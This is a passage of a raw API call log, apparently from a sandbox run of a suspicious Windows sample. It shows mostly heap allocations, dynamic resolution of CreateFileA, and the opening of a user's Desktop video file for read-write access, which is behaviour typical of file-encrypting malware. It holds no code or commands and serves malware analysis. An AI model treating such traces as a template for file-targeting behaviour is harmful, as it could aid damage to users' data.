Flags=0x0, Size=0x8) returned 0x7af7c8 [0030.880] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0030.880] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0030.880] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0030.880] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0030.880] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0030.880] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0030.880] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0030.880] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0030.880] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0030.880] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0030.880] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0030.880] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0030.880] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0030.880] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0030.880] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0030.880] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0030.880] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0030.880] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0030.880] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0030.880] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0030.880] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0030.880] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0030.880] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0030.880] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0030.880] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0030.880] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0030.880] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0030.880] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0030.880] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0030.881] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0030.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0030.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0030.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0030.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0030.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0030.881] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0030.881] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0030.881] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0030.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0030.881] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0030.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0030.881] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0030.881] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0030.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0030.881] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0030.881] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0030.881] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0030.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0030.881] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0030.881] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0030.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0030.881] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0030.881] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0030.881] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0030.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0030.881] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0030.881] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0030.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0030.881] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0030.881] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0030.881] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0030.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0030.881] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0030.882] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0030.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0030.882] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0030.882] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0030.882] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0030.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0030.882] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0030.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0030.882] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0030.882] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0030.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0030.882] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0030.882] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0030.882] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0030.882] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0030.882] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0030.882] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0030.882] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0030.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0030.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0030.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0030.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0030.882] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0030.882] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0030.882] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0030.882] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0030.882] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0030.882] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0030.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0030.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0030.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0030.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0030.882] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0030.882] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0030.883] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0030.883] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0030.883] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0030.883] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0030.883] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0030.883] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0030.883] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0030.883] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0030.883] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0030.883] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0030.883] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0030.883] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0030.883] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0030.883] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0030.883] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0030.883] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0030.883] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0030.883] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0030.883] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0030.883] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0030.883] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0030.883] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0030.883] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0030.883] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0030.883] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0030.883] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0030.883] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0030.883] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0030.883] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0030.883] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0030.883] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0030.883] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0030.883] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0030.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0030.884] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0030.884] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0030.884] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0030.884] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0030.884] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0030.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0030.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0030.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0030.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0030.884] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0030.884] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0030.884] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0030.884] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0030.884] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0030.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0030.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0030.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0030.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0030.884] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0030.884] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0030.884] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0030.884] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0030.884] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x889730 [0030.884] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x889730, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0030.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0030.884] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0030.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0030.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0030.885] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0030.885] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0030.885] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0030.885] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0030.885] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0030.885] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889730 [0030.885] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x889730, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0030.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0030.885] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0030.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0030.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0030.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0030.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0030.885] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0030.885] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0030.885] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0030.885] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0030.885] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0030.885] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0030.885] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0030.885] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0030.885] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0x936008 [0030.886] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\seoYHLX7CEV1iLpfdx.avi", cchWideChar=80, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 80 [0030.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3630 [0030.886] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\seoYHLX7CEV1iLpfdx.avi", cchWideChar=80, lpMultiByteStr=0x7f3630, cbMultiByte=80, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\seoYHLX7CEV1iLpfdx.avi", lpUsedDefaultChar=0x0) returned 80 [0030.886] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0030.886] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0030.886] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0030.886] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0030.886] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0030.886] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0030.886] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0030.886] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0030.886] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0030.886] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\seoYHLX7CEV1iLpfdx.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\seoyhlx7cev1ilpfdx.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0030.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0030.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b85a8 [0030.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0030.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0030.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0030.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0030.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0030.886] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0030.886] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0030.887] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0030.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0030.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0030.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0030.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0030.887] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x936008, cbMultiByte=80, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 80 [0030.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa0) returned 0x7d8558 [0030.887] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x936008, cbMultiByte=80, lpWideCharStr=0x7d8558, cchWideChar=80 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\seoYHLX7CEV1iLpfdx.avi") returned 80 [0030.887] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0030.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa0) returned 0x7d8600 [0030.887] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d8558 | out: hHeap=0x770000) returned 1 [0030.887] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x936008 | out: hHeap=0x770000) returned 1 [0030.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0030.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0030.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0030.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0030.887] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0030.887] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0030.887] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0030.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0030.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0030.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0030.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0030.887] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0030.887] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0030.887] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0030.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0030.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0030.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0030.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0030.887] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0030.887] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0030.887] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0030.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0030.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0030.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0030.888] RtlAllocateHeap 